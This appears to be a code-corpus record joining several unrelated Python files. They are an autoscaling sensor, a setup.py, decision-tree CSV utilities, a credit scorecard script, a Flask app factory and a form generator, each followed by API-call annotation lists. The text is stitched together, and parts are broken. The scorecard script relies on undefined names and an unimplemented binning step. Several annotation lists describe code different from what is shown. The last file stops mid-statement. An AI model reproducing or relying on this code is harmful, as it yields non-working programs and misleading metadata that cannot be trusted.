        # ... stable groups may be able to scale down.
        for asg in stable_asgs:
            self._process_asg(asg, 'deflate')

    def cleanup(self):
        pass

    def add_trigger(self, trigger):
        pass

    def update_trigger(self, trigger):
        pass

    def remove_trigger(self, trigger):
        pass

    def _process_asg(self, asg, action):
        """Dispatch a scaling pulse for ``asg`` if it passes the bound and
        cool-down checks and is not already mid-scale.

        :param asg: autoscale group name.
        :param action: either 'expand' or 'deflate'.
        """
        trigger_type = self._trigger[action]
        bound = self._bound[action]
        group_status = self._kvp_get('asg.%s.status' % (asg), local=False)
        last_event_timestamp = self._kvp_get('asg.%s.last_%s_timestamp' % (asg, action), local=False)
        event_delay = self._kvp_get('asg.%s.%s_delay' % (asg, action), local=False)
        node_bound = self._kvp_get('asg.%s.%s_nodes' % (asg, bound), local=False)
        # Fetched once; the original read this same key twice under two names.
        total_nodes = self._kvp_get('asg.%s.total_nodes' % (asg), local=False)
        if group_status in GROUP_ACTIVE_STATUS:
            self._logger.info("AutoScaleGovernor: Autoscale group is currently %s. Skipping..." %
                              (group_status))
            return
        # Ensure we have all the required variables.
        if last_event_timestamp and event_delay and node_bound and total_nodes:
            # See if the ASG is eligible to be acted upon (bound + cool-down).
            bound_check = getattr(self, '_%s_bound_check' % bound)(int(node_bound), int(total_nodes))
            delay_check = self._event_delay_check(int(last_event_timestamp), int(event_delay))
            if bound_check and delay_check:
                self._dispatch_trigger(trigger_type, asg)
        else:
            self._logger.info("AutoScaleGovernor: Not all K/V pairs exist for ASG %s. Skipping..." % asg)

    def _event_delay_check(self, last_event_timestamp, event_delay):
        """True once ``event_delay`` minutes have passed since the last event."""
        return last_event_timestamp + (event_delay * 60) < int(time.time())

    def _max_bound_check(self, max_nodes, total_nodes):
        """True while the group is below its maximum size (room to expand)."""
        return total_nodes < max_nodes

    def _min_bound_check(self, min_nodes, total_nodes):
        """True while the group is above its minimum size (room to deflate)."""
        return total_nodes > min_nodes

    def _dispatch_trigger(self, trigger, asg):
        """Send the pulse trigger with the group name as payload."""
        self._sensor_service.dispatch(trigger=trigger, payload={'asg': asg})
| [
"ast.literal_eval",
"time.time",
"eventlet.monkey_patch"
] | [((133, 218), 'eventlet.monkey_patch', 'eventlet.monkey_patch', ([], {'os': '(True)', 'select': '(True)', 'socket': '(True)', 'thread': '(True)', 'time': '(True)'}), '(os=True, select=True, socket=True, thread=True, time=True\n )\n', (154, 218), False, 'import eventlet\n'), ((1490, 1517), 'ast.literal_eval', 'ast.literal_eval', (['kvp.value'], {}), '(kvp.value)\n', (1506, 1517), False, 'import ast\n'), ((3764, 3775), 'time.time', 'time.time', ([], {}), '()\n', (3773, 3775), False, 'import time\n')] |
#!/usr/bin/env python
# Author: <NAME>
# email: <EMAIL>

# Prefer setuptools; fall back to plain distutils where it is unavailable.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

# The README doubles as the long description shown on PyPI.
with open('README.md', encoding='utf-8') as readme:
    long_description_text = readme.read()

setup(
    name='sparkdataset',
    description=("Provides instant access to many popular datasets right from "
                 "Pyspark (in dataframe structure)."),
    author='<NAME>',
    url='https://github.com/Spratiher9/SparkDataset',
    download_url='https://github.com/Spratiher9/SparkDataset/archive/refs/tags/1.0.0.tar.gz',
    license='MIT',
    author_email='<EMAIL>',
    version='1.0.0',
    long_description=long_description_text,
    long_description_content_type='text/markdown',
    keywords=['Spark', 'Apache Spark', 'benchmarking', 'data', 'datasets', 'standard data'],
    install_requires=['pandas', 'pyspark==3.1.2'],
    packages=['sparkdataset', 'sparkdataset.utils'],
    package_data={'sparkdataset': ['*.gz', 'resources.tar.gz']},
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'Topic :: Software Development',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.10'
    ]
)
"distutils.core.setup"
] | [((243, 1188), 'distutils.core.setup', 'setup', ([], {'name': '"""sparkdataset"""', 'description': '"""Provides instant access to many popular datasets right from Pyspark (in dataframe structure)."""', 'author': '"""<NAME>"""', 'url': '"""https://github.com/Spratiher9/SparkDataset"""', 'download_url': '"""https://github.com/Spratiher9/SparkDataset/archive/refs/tags/1.0.0.tar.gz"""', 'license': '"""MIT"""', 'author_email': '"""<EMAIL>"""', 'version': '"""1.0.0"""', 'long_description': 'bdescription', 'long_description_content_type': '"""text/markdown"""', 'keywords': "['Spark', 'Apache Spark', 'benchmarking', 'data', 'datasets', 'standard data']", 'install_requires': "['pandas', 'pyspark==3.1.2']", 'packages': "['sparkdataset', 'sparkdataset.utils']", 'package_data': "{'sparkdataset': ['*.gz', 'resources.tar.gz']}", 'classifiers': "['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers', 'Topic :: Software Development',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.10']"}), "(name='sparkdataset', description=\n 'Provides instant access to many popular datasets right from Pyspark (in dataframe structure).'\n , author='<NAME>', url='https://github.com/Spratiher9/SparkDataset',\n download_url=\n 'https://github.com/Spratiher9/SparkDataset/archive/refs/tags/1.0.0.tar.gz'\n , license='MIT', author_email='<EMAIL>', version='1.0.0',\n long_description=bdescription, long_description_content_type=\n 'text/markdown', keywords=['Spark', 'Apache Spark', 'benchmarking',\n 'data', 'datasets', 'standard data'], install_requires=['pandas',\n 'pyspark==3.1.2'], packages=['sparkdataset', 'sparkdataset.utils'],\n package_data={'sparkdataset': ['*.gz', 'resources.tar.gz']},\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers', 'Topic :: Software Development',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.10'])\n", (248, 1188), False, 'from 
distutils.core import setup\n')] |
#!/usr/bin/python
import json
import sys
import csv
import math
def VarInBranchLimited(tree, uvars, writer, limit):
    """Recursively emit one CSV row per (possibly truncated) branch.

    Descent stops once the accumulated path plus the node's whole subtree
    fits within `limit` variables, or at a last-split node; the remaining
    subtree's variables are then emitted in one de-duplicated row.

    Requires `AddWeigthTree` to have annotated the tree with 'Weigth' and
    'LastSplit'.
    """
    # Cut-off test: path length + remaining subtree weight vs. the limit.
    if ((len(uvars)+tree['Weigth']) <= limit) or (tree['LastSplit'] == True) :
        vars = uvars[:] + VarInTree(tree)
        # dict.fromkeys de-duplicates while preserving first-seen order.
        vars = list(dict.fromkeys(vars))
        writer.writerow(vars)
        del vars
    else:
        vars = uvars[:] + [tree['splitVar']]
        if 'splitVar' in tree['left']:
            VarInBranchLimited(tree['left'], vars, writer, limit)
        if 'splitVar' in tree['right']:
            VarInBranchLimited(tree['right'], vars, writer, limit)
        del vars
    return
def AddWeigthTree(tree):
    """Annotate every node with 'Weigth' (number of split nodes in its
    subtree, itself included) and 'LastSplit' (True when the subtree holds
    exactly one split, i.e. this node is the final split of its branch).

    Returns the node's own weight so parents can accumulate it.
    """
    if 'splitVar' in tree:
        if 'left' in tree:
            left_weight = AddWeigthTree(tree['left'])
        if 'right' in tree:
            right_weight = AddWeigthTree(tree['right'])
        tree['Weigth'] = left_weight + right_weight + 1
    else:
        # Leaf: contributes no split of its own.
        tree['Weigth'] = 0
    tree['LastSplit'] = tree['Weigth'] == 1
    return tree['Weigth']
def VarPerBranchLimited(trees, ofn, limit):
    """Write one CSV line per (limit-truncated) branch of every tree to `ofn`.

    Each row starts with the tree index, followed by the branch's variables
    (de-duplicated, comma separated).  See `VarInBranchLimited` for the
    truncation rule.
    """
    with open(ofn,'w') as csvfile:
        writer = csv.writer(csvfile)
        for i, tree in enumerate(trees):
            if 'splitVar' in tree['rootNode']:
                vars = list()
                # First column of every row is the tree index.
                vars.append(i)
                # Weights are required by VarInBranchLimited's cut-off test.
                tree['Weigth'] = AddWeigthTree(tree['rootNode'])
                VarInBranchLimited(tree['rootNode'], vars, writer, limit)
def VarInBranch(tree, uvars, writer):
    """Depth-first walk of the split tree; at every leaf branch, write the
    accumulated root-to-leaf variable path (duplicates kept) as one CSV row.

    :param tree: node dict with 'splitVar', 'left' and 'right' keys.
    :param uvars: variables accumulated on the path so far (not mutated).
    :param writer: csv.writer receiving one row per completed branch.
    """
    path = uvars[:] + [tree['splitVar']]
    has_child_split = False
    for side in ('left', 'right'):
        child = tree[side]
        if 'splitVar' in child:
            VarInBranch(child, path, writer)
            has_child_split = True
    if not has_child_split:
        # Leaf branch: emit the full variable path.
        writer.writerow(path)
def VarPerBranche(trees, ofn):
    """Write one CSV line per root-to-leaf branch of every tree to `ofn`:
    the tree index followed by the branch's variables (duplicates kept)."""
    with open(ofn,'w') as csvfile:
        writer = csv.writer(csvfile)
        for i, tree in enumerate(trees):
            if 'splitVar' in tree['rootNode']:
                vars = list()
                # First column of every row is the tree index.
                vars.append(i)
                VarInBranch(tree['rootNode'], vars, writer)
                del vars
def VarInTree(tree):
    """Collect every split variable in `tree`, pre-order, duplicates kept.

    Leaves (nodes without 'splitVar') contribute nothing.
    """
    collected = []
    if 'splitVar' in tree:
        collected.append(tree['splitVar'])
        if 'left' in tree:
            collected.extend(VarInTree(tree['left']))
        if 'right' in tree:
            collected.extend(VarInTree(tree['right']))
    return collected
def VarPerTree(trees, ofn):
    """Write one CSV line per tree to `ofn`: the de-duplicated, comma
    separated variables that tree uses."""
    with open(ofn,'w') as csvfile:
        writer = csv.writer(csvfile)
        for tree in trees:
            treeVars = VarInTree(tree['rootNode'])
            # dict.fromkeys de-duplicates while preserving first-seen order.
            treeVars = list(dict.fromkeys(treeVars))
            writer.writerow(treeVars)
def VarInForest(trees, ofn):
    """Write the de-duplicated set of variables used anywhere in the forest
    as a single comma-separated line of `ofn`."""
    forestVars = list()
    for tree in trees:
        treeVars = VarInTree(tree['rootNode'])
        forestVars += treeVars
    # dict.fromkeys de-duplicates while preserving first-seen order.
    forestVars = list(dict.fromkeys(forestVars))
    with open(ofn,'w') as csvfile:
        writer = csv.writer(csvfile)
        writer.writerow(forestVars)
def ListRoots(trees, ofn):
"""Save roots one per line"""
with open(ofn,'w') as csvfile:
writer = csv.writer(csvfile)
for tree in trees:
if 'rootNode' in tree and 'splitVar' in tree['rootNode']:
r = list()
r.append(tree['rootNode']['splitVar'])
writer.writerow(r)
def Choose(n,r):
    """Computes n! / (r! (n-r)!) exactly. Returns a python int.

    Delegates to math.comb (Python 3.8+), which evaluates the binomial
    coefficient with exact integer arithmetic; the asserts preserve the
    original argument contract.
    """
    assert n >= 0
    assert 0 <= r <= n
    return math.comb(n, r)
def NumComb(ifn, order, isFirstColIndex=False):
    """Sum, over every row of the CSV file `ifn`, the number of size-`order`
    variable combinations that row admits.

    :param ifn: input CSV path; each row lists the variables of one
        tree/branch (as produced by the writers above).
    :param order: combination size r in C(n, r).
    :param isFirstColIndex: when True the first column is an index (e.g. the
        tree number) and is excluded from the variable count.
    :return: total combination count across all rows.
    """
    with open(ifn) as csvfile:
        readCSV = csv.reader(csvfile, delimiter=',')
        numComb=0
        for row in readCSV:
            numVar = len(row)
            if(isFirstColIndex):
                numVar -= 1
            # Rows shorter than `order` contribute nothing.
            if numVar >= order:
                numComb += Choose(numVar,order)
    return numComb
# CLI entry point.  Usage: script <command> <input> [<output>|<order>] [<limit>]
#   forest / tree / branch / limit / roots : read a JSON forest from <input>
#       and write variable listings to <output> (see the functions above)
#   comb / combx : read a CSV from <input> and print the number of size-
#       <order> variable combinations (combx excludes the first, index, column)
if __name__ == '__main__':
    argc = len(sys.argv)
    if(argc < 3):
        print("Enter a command and path to the inptu file")
        exit()
    command = sys.argv[1]
    inputFile = sys.argv[2]
    if(argc > 3):
        outputFile = sys.argv[3]
    thr = -1
    if(argc > 4):
        thr = int(sys.argv[4])
    # comb/combx read CSV, every other command reads the JSON forest.
    if(command != "comb" and command != "combx"):
        with open(inputFile, 'r') as json_file:
            full_data = json.load(json_file)
    if(command=="forest"):
        VarInForest(full_data['trees'], outputFile)
    if(command=="tree"):
        VarPerTree(full_data['trees'], outputFile)
    if(command=="branch"):
        VarPerBranche(full_data['trees'], outputFile)
    if(command=="limit"):
        if(thr==-1):
            print("pleas enter limit (4th argument)")
            exit()
        VarPerBranchLimited(full_data['trees'], outputFile, thr)
    if(command=="roots"):
        ListRoots(full_data['trees'], outputFile)
    if(command=="comb" or command=="combx"):
        if(argc < 4):
            print("pleas enter order")
            exit()
        order = int(outputFile) # There is no output file
        excludeFirstCol=False
        if(command=="combx"):
            excludeFirstCol=True
        print(NumComb(inputFile, order, isFirstColIndex=excludeFirstCol))
| [
"json.load",
"csv.writer",
"csv.reader"
] | [((1424, 1443), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (1434, 1443), False, 'import csv\n'), ((2423, 2442), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (2433, 2442), False, 'import csv\n'), ((3150, 3169), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (3160, 3169), False, 'import csv\n'), ((3681, 3700), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (3691, 3700), False, 'import csv\n'), ((3851, 3870), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (3861, 3870), False, 'import csv\n'), ((4427, 4461), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (4437, 4461), False, 'import csv\n'), ((5140, 5160), 'json.load', 'json.load', (['json_file'], {}), '(json_file)\n', (5149, 5160), False, 'import json\n')] |
'''
makeRankingCard.py:制作评分卡。
Author: HeRaNO
'''
import sys
import imblearn
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression as LR
# Read data start
# Read the pre-split samples.  Downstream code (the WOE-mapping section)
# references these frames as `model_data` / `vali_data`, so bind them under
# those names (they were originally assigned to `model` / `vali`, which
# nothing else in the script used -- a NameError waiting to happen).
model_data = pd.read_csv("model_data.csv", index_col = 0)
vali_data = pd.read_csv("vali_data.csv", index_col = 0)
# Read data end
# Start binning
def calcWOE(num_bins):
    """Build a weight-of-evidence table from binned class counts.

    :param num_bins: iterable of (min, max, count_0, count_1) tuples, one
        per bin, where count_0 are "good" samples and count_1 are "bad".
    :return: DataFrame with the input columns plus total, percentage,
        bad_rate, goodpercent, badpercent and woe.
    """
    table = pd.DataFrame(num_bins, columns=["min", "max", "count_0", "count_1"])
    table["total"] = table["count_0"] + table["count_1"]
    table["percentage"] = table["total"] / table["total"].sum()
    table["bad_rate"] = table["count_1"] / table["total"]
    table["goodpercent"] = table["count_0"] / table["count_0"].sum()
    table["badpercent"] = table["count_1"] / table["count_1"].sum()
    # WOE = ln(good distribution / bad distribution) per bin.
    table["woe"] = np.log(table["goodpercent"] / table["badpercent"])
    return table
def calcIV(df):
    """Information Value of a binning: sum over bins of
    (goodpercent - badpercent) * woe, computed from a calcWOE-style frame."""
    return np.sum((df["goodpercent"] - df["badpercent"]) * df.woe)
def bestBin(DF, X, Y, n, q):
    """Unimplemented stub for the automatic optimal-binning search.

    NOTE(review): judging by the signature and the author's notes below, the
    intent is to start from `q` quantile bins of column `X` in frame `DF`
    and merge down to `n` bins against the binary target `Y`; the per-column
    bin counts listed in the module notes were chosen manually instead.
    """
    pass
'''
自己写吧我写崩溃了
大概的取值:
RevolvingUtilizationOfUnsecuredLines:8
age:11
DebtRatio:11
MonthlyIncome:9
NumberOfOpenCreditLinesAndLoans:6
其余均无法分箱,需要手动分
'''
# 分箱应该得到一个 bins_of_col[] 数组,里面是分箱的分段点
# Binning end
# Modeling start
# Map each feature to its bin's WOE value, producing an all-WOE design matrix.
# NOTE(review): assumes `model_data`, `vali_data`, `bins_of_col` and `woeall`
# are bound by the preceding (unfinished) binning step -- confirm before
# running this script end-to-end.
model_woe = pd.DataFrame(index = model_data.index)
for col in bins_of_col:
    model_woe[col] = pd.cut(model_data[col],bins_of_col[col]).map(woeall[col])
model_woe["SeriousDlqin2yrs"] = model_data["SeriousDlqin2yrs"]
# Same WOE mapping for the validation split.
vali_woe = pd.DataFrame(index = vali_data.index)
for col in bins_of_col:
    vali_woe[col] = pd.cut(vali_data[col],bins_of_col[col]).map(woeall[col])
vali_woe["SeriousDlqin2yrs"] = vali_data["SeriousDlqin2yrs"]
# Last column is the label; everything before it is the design matrix.
vali_X = vali_woe.iloc[:,:-1]
vali_y = vali_woe.iloc[:,-1]
X = model_woe.iloc[:,:-1]
y = model_woe.iloc[:,-1]
lr = LR().fit(X, y)
# Accuracy on the validation split (return value is discarded).
lr.score(vali_X, vali_y)
# Make card start
# Standard scorecard scaling: B*ln(2) = 20 points halve the odds (PDO = 20),
# and odds of 1:60 map to a score of 600.
B = 20 / np.log(2)
A = 600 + B * np.log(1 / 60)
# NOTE(review): `base_score` was an undefined name in the original; the usual
# scorecard convention derives it from the model intercept -- confirm against
# the material this script follows.
base_score = A - B * lr.intercept_[0]
score_file = "score.csv"
with open(score_file, "w") as fdata:
    fdata.write("base_score,{}\n".format(base_score))
for i, col in enumerate(X.columns):
    # Per-bin points for this feature: WOE * (-B * logistic coefficient).
    score = woeall[col] * (-B * lr.coef_[0][i])
    score.name = "Score"
    score.index.name = col
    # Append each feature's score table below the base score.
    # (`file` was an undefined name in the original; fixed to the score path.)
    score.to_csv(score_file, header = True, mode = "a")
# Make card end
| [
"pandas.read_csv",
"numpy.log",
"pandas.cut",
"sklearn.linear_model.LogisticRegression",
"numpy.sum",
"pandas.DataFrame"
] | [((204, 246), 'pandas.read_csv', 'pd.read_csv', (['"""model_data.csv"""'], {'index_col': '(0)'}), "('model_data.csv', index_col=0)\n", (215, 246), True, 'import pandas as pd\n'), ((256, 297), 'pandas.read_csv', 'pd.read_csv', (['"""vali_data.csv"""'], {'index_col': '(0)'}), "('vali_data.csv', index_col=0)\n", (267, 297), True, 'import pandas as pd\n'), ((1137, 1173), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'model_data.index'}), '(index=model_data.index)\n', (1149, 1173), True, 'import pandas as pd\n'), ((1352, 1387), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'vali_data.index'}), '(index=vali_data.index)\n', (1364, 1387), True, 'import pandas as pd\n'), ((411, 450), 'pandas.DataFrame', 'pd.DataFrame', (['num_bins'], {'columns': 'columns'}), '(num_bins, columns=columns)\n', (423, 450), True, 'import pandas as pd\n'), ((693, 737), 'numpy.log', 'np.log', (["(df['goodpercent'] / df['badpercent'])"], {}), "(df['goodpercent'] / df['badpercent'])\n", (699, 737), True, 'import numpy as np\n'), ((817, 838), 'numpy.sum', 'np.sum', (['(rate * df.woe)'], {}), '(rate * df.woe)\n', (823, 838), True, 'import numpy as np\n'), ((1753, 1762), 'numpy.log', 'np.log', (['(2)'], {}), '(2)\n', (1759, 1762), True, 'import numpy as np\n'), ((1668, 1672), 'sklearn.linear_model.LogisticRegression', 'LR', ([], {}), '()\n', (1670, 1672), True, 'from sklearn.linear_model import LogisticRegression as LR\n'), ((1777, 1791), 'numpy.log', 'np.log', (['(1 / 60)'], {}), '(1 / 60)\n', (1783, 1791), True, 'import numpy as np\n'), ((1218, 1259), 'pandas.cut', 'pd.cut', (['model_data[col]', 'bins_of_col[col]'], {}), '(model_data[col], bins_of_col[col])\n', (1224, 1259), True, 'import pandas as pd\n'), ((1431, 1471), 'pandas.cut', 'pd.cut', (['vali_data[col]', 'bins_of_col[col]'], {}), '(vali_data[col], bins_of_col[col])\n', (1437, 1471), True, 'import pandas as pd\n')] |
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from redis import StrictRedis
from flask_wtf.csrf import CSRFProtect, generate_csrf
from flask_session import Session
from config import config_dict
# No app object exists yet, so nothing is initialized here -- this is only a
# declaration. Why this works: see the source; the real binding to an app
# happens later inside the application factory (lazy-loading pattern).
db = SQLAlchemy()
# StrictRedis does not wrap a deferred-init helper the way SQLAlchemy does,
# so the connection is simply kept as a module-level global and assigned
# inside the factory.
redis_store = None  # type: StrictRedis
"""记录日志的配置"""
def setup_log(config_name):
    """Configure application-wide logging for the given environment.

    Looks up the configuration class registered under ``config_name`` in
    ``config_dict``, applies its log level, and attaches a size-rotated
    file handler to the root logger so every record also lands in
    ``logs/log``.
    """
    env_config = config_dict[config_name]
    # The base log level differs per environment (verbose in development,
    # terse in production), so it comes from the selected config class.
    logging.basicConfig(level=env_config.LOG_LEVEL)
    # Rotate at 100 MB per file and keep at most 10 backup files on disk.
    rotating_handler = RotatingFileHandler(
        "logs/log", maxBytes=1024 * 1024 * 100, backupCount=10
    )
    # Record format: level, source file, line number, message.
    rotating_handler.setFormatter(
        logging.Formatter('%(levelname)s %(filename)s:%(lineno)d %(message)s')
    )
    # Attach to the root logger so Flask's own logging is captured too.
    logging.getLogger().addHandler(rotating_handler)
"""
# ofo生产单车:原材料--->车间--->小黄
# 工厂方法:传入配置名称--->返回对应配置的app对象
# development: --> app开发模式的app对象
# production: --> app线上模式的app对象
"""
# todo 谁传给你参数
"""创建app create_app方法:工厂方法"""
def craete_app(config_name):
    """Application factory: build a Flask app for the given environment.

    Parameters
    ----------
    config_name : str
        Key into ``config_dict`` selecting the environment
        (e.g. ``"development"`` or ``"production"``).

    Returns
    -------
    Flask
        A fully configured application instance.
    """
    # Logging is configured here because it depends on the environment:
    # development wants verbose output, production wants quiet logs.
    setup_log(config_name)
    app = Flask(__name__)
    configClass = config_dict[config_name]
    app.config.from_object(configClass)  # load the environment's settings
    # SQLAlchemy abstracts the database away so developers work with Python
    # objects instead of raw SQL; flask-sqlalchemy is the Flask integration.
    # Docs: http://docs.jinkan.org/docs/flask-sqlalchemy
    #
    # BUGFIX: the original code did ``db = SQLAlchemy(app)``, which created a
    # *local* variable shadowing the module-level ``db`` and left the global
    # instance unbound. ``init_app`` is the correct factory-pattern call.
    db.init_app(app)
    # Create the redis connection shared by the whole process.
    global redis_store
    redis_store = StrictRedis(
        host=configClass.REDIS_HOST,
        port=configClass.REDIS_PORT,
        db=configClass.REDIS_NUM,
    )
    # Enable CSRF protection:
    #   1. automatically reads csrf_token from the cookie,
    #   2. automatically reads csrf_token from the ajax request header,
    #   3. validates that the two values match.
    CSRFProtect(app)
    # Move server-side sessions from Flask's in-process storage to redis.
    Session(app)
    # Blueprints are imported lazily to avoid circular imports.
    from info.moduls.index import index_bp
    app.register_blueprint(index_bp)
    from info.moduls.passport import passport_bp
    app.register_blueprint(passport_bp)
    # Return the app configured for the chosen mode (development/production).
    return app
| [
"logging.basicConfig",
"logging.getLogger",
"flask.Flask",
"logging.Formatter",
"flask_wtf.csrf.CSRFProtect",
"logging.handlers.RotatingFileHandler",
"flask_session.Session",
"redis.StrictRedis",
"flask_sqlalchemy.SQLAlchemy"
] | [((355, 367), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (365, 367), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((680, 728), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'configClass.LOG_LEVEL'}), '(level=configClass.LOG_LEVEL)\n', (699, 728), False, 'import logging\n'), ((827, 902), 'logging.handlers.RotatingFileHandler', 'RotatingFileHandler', (['"""logs/log"""'], {'maxBytes': '(1024 * 1024 * 100)', 'backupCount': '(10)'}), "('logs/log', maxBytes=1024 * 1024 * 100, backupCount=10)\n", (846, 902), False, 'from logging.handlers import RotatingFileHandler\n'), ((959, 1029), 'logging.Formatter', 'logging.Formatter', (['"""%(levelname)s %(filename)s:%(lineno)d %(message)s"""'], {}), "('%(levelname)s %(filename)s:%(lineno)d %(message)s')\n", (976, 1029), False, 'import logging\n'), ((1505, 1520), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (1510, 1520), False, 'from flask import Flask\n'), ((1903, 1918), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (1913, 1918), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((1979, 2079), 'redis.StrictRedis', 'StrictRedis', ([], {'host': 'configClass.REDIS_HOST', 'port': 'configClass.REDIS_PORT', 'db': 'configClass.REDIS_NUM'}), '(host=configClass.REDIS_HOST, port=configClass.REDIS_PORT, db=\n configClass.REDIS_NUM)\n', (1990, 2079), False, 'from redis import StrictRedis\n'), ((2196, 2212), 'flask_wtf.csrf.CSRFProtect', 'CSRFProtect', (['app'], {}), '(app)\n', (2207, 2212), False, 'from flask_wtf.csrf import CSRFProtect, generate_csrf\n'), ((2275, 2287), 'flask_session.Session', 'Session', (['app'], {}), '(app)\n', (2282, 2287), False, 'from flask_session import Session\n'), ((1142, 1161), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (1159, 1161), False, 'import logging\n')] |
"""Class to dynamically create the different forms in the config file
"""
import os
from wtforms import (
BooleanField, SelectField, StringField, FloatField, IntegerField,
FormField, TextAreaField, FieldList, DecimalField
)
from wtforms.validators import InputRequired, Optional, NumberRange, \
ValidationError, Length, UUID, URL, Email
from flask_wtf import FlaskForm as Form
from wtforms import Form as NoCsrfForm
from werkzeug.utils import secure_filename
import glob
import pandas as pd
from loris import config
from loris.app.forms import NONES
from loris.app.forms.formmixin import (
DynamicFileField, DictField, ListField,
JsonSerializableValidator, Extension, FormMixin
)
from loris.app.autoscripting.utils import (
json_reader, array_reader, recarray_reader,
frame_reader, series_reader, EnumReader, ListReader, TupleReader,
DictReader, DbReader
)
from loris.errors import LorisError
class AutoscriptedField:
    """One auto-generated form field built from an autoscript description.

    ``value`` may be:

    * a type-name string (``'int'``, ``'list'``, ``'pandas.DataFrame'``, ...),
    * a list of choices (rendered as a select field), or
    * a dict with the keys ``type``, ``comment``, ``default``, ``loc`` and
      ``iterate`` describing the field in more detail.

    The constructor validates the description and immediately builds both
    the WTForms field (``self.field``) and the post-processing callable
    (``self.post_process``) that converts a submitted value into its
    Python representation.
    """

    def __init__(self, key, value, folderpath):
        self.key = key
        self.folderpath = folderpath

        if isinstance(value, (str, list)):
            # Shorthand form: only the type name (or the choice list) given.
            self.value = value
            self.description = None
            self.default = None
            self.required = True
            self.iterate = None
            self.loc = None
        elif isinstance(value, dict):
            # Long form: reject any keyword that is not understood.
            truth = set(value) - {'type', 'comment', 'default', 'loc', 'iterate'}
            if truth:
                raise LorisError(
                    'Key in dynamic auto-generated form contains '
                    f'illegal keywords: {truth}.'
                )
            if 'type' not in value:
                raise LorisError(
                    'Must provide type key for dynamic auto-generated form; '
                    f'only provided these keys for "{key}": {set(value)}.'
                )
            self.value = value.get('type')
            self.description = value.get('comment', None)
            self.default = value.get('default', None)
            # Optional only when an explicit default of None is given; any
            # other default (or no default key) keeps the field required.
            self.required = (
                'default' not in value
                or value.get('default', None) is not None)
            self.loc = value.get('loc', None)
            self.iterate = value.get('iterate', False)
        else:
            # BUGFIX: the exception was previously constructed but never
            # raised, silently accepting malformed descriptions.
            raise LorisError(f"value is wrong type {type(value)}")

        self.get_field()

    def get_field(self):
        """Build ``self.field`` and ``self.post_process`` from the spec."""
        self.field, self.post_process = self._get_field(
            self.key, self.value, self.required, self.default,
            self.description, self.iterate, self.loc, self.folderpath
        )

    @staticmethod
    def file_processing(value):
        """Return the reader callable used to load an uploaded/selected file.

        Unknown types fall back to the identity function.
        """
        if value == 'numpy.array':
            post_process = array_reader
        elif value == 'numpy.recarray':
            post_process = recarray_reader
        elif value == 'pandas.DataFrame':
            post_process = frame_reader
        elif value == 'pandas.Series':
            post_process = series_reader
        elif value == 'json':
            post_process = json_reader
        else:
            return lambda x: x
        return post_process

    @classmethod
    def _get_field(
        cls, key, value, required, default, description,
        iterate, loc, folderpath
    ):
        """Create the WTForms field and its post-processor.

        Returns
        -------
        tuple
            ``(field, post_process)`` where ``field`` is an *unbound*
            WTForms field and ``post_process`` converts the submitted
            value into its Python representation.

        Raises
        ------
        LorisError
            If the type/loc combination is not understood or a referenced
            folder/table/column does not exist.
        """
        # Default post-processing is the identity.
        def post_process(x):
            return x

        if required:
            kwargs = {
                'validators': [InputRequired()],
                'render_kw': {'nullable': False}
            }
        else:
            kwargs = {
                'validators': [Optional()],
                'render_kw': {'nullable': True}
            }
        kwargs['default'] = default
        kwargs['label'] = key.replace('_', ' ')
        kwargs['description'] = (key if description is None else description)

        if loc is None and not isinstance(value, dict):
            # Plain typed field (no location, no nested form).
            if value == 'list':
                kwargs['validators'].append(JsonSerializableValidator(list))
                field = ListField(**kwargs)
            elif value == 'dict':
                kwargs['validators'].append(JsonSerializableValidator(dict))
                field = DictField(**kwargs)
            elif value == 'str':
                field = StringField(**kwargs)
            elif value == 'set':
                # Entered as a JSON list, converted to a set afterwards.
                kwargs['validators'].append(JsonSerializableValidator(list))
                post_process = set
                field = ListField(**kwargs)
            elif value == 'tuple':
                # Entered as a JSON list, converted to a tuple afterwards.
                kwargs['validators'].append(JsonSerializableValidator(list))
                post_process = tuple
                field = ListField(**kwargs)
            elif value == 'int':
                field = IntegerField(**kwargs)
            elif value == 'float':
                field = FloatField(**kwargs)
            elif value == 'bool':
                # Unchecked checkboxes submit nothing, so InputRequired
                # would always fail -- booleans are always Optional.
                kwargs['validators'] = [Optional()]
                field = BooleanField(**kwargs)
            elif value == 'numpy.array':
                kwargs['validators'].append(Extension())
                post_process = cls.file_processing(value)
                field = DynamicFileField(**kwargs)
            elif value == 'numpy.recarray':
                kwargs['validators'].append(Extension())
                post_process = cls.file_processing(value)
                field = DynamicFileField(**kwargs)
            elif value == 'pandas.DataFrame':
                kwargs['validators'].append(Extension())
                post_process = cls.file_processing(value)
                field = DynamicFileField(**kwargs)
            elif value == 'pandas.Series':
                kwargs['validators'].append(Extension())
                post_process = cls.file_processing(value)
                field = DynamicFileField(**kwargs)
            elif value == 'json':
                kwargs['validators'].append(Extension(['json']))
                post_process = cls.file_processing(value)
                field = DynamicFileField(**kwargs)
            elif value == 'file':
                kwargs['validators'].append(
